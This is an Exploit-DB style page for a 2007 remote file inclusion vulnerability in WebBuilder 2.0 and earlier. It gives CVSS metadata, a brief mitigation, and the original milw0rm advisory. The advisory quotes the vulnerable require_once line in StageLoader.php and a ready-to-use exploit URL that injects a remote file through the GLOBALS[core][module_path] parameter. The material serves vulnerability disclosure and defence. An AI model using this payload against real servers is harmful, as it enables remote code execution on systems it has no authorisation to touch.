header-logo
Suggest Exploit
vendor:
WebBuilder
by:
GolD_M (Mahmnood_ali)
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: WebBuilder
Affected Version From: WebBuilder <= 2.0
Affected Version To: WebBuilder <= 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebBuilder <= 2.0 Remote File Include Vulnerability

The WebBuilder version 2.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file using the 'GLOBALS[core][module_path]' parameter in the StageLoader.php file. This allows the attacker to execute arbitrary code on the affected system.

Mitigation:

Update to a patched version of WebBuilder or apply appropriate security measures to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <= 2.0 Remote File Include Vulnerability *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: *
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php *
require_once($GLOBALS['core']['module_path'].'/module_common.php'); *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: *
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?  *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com     *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-02-01]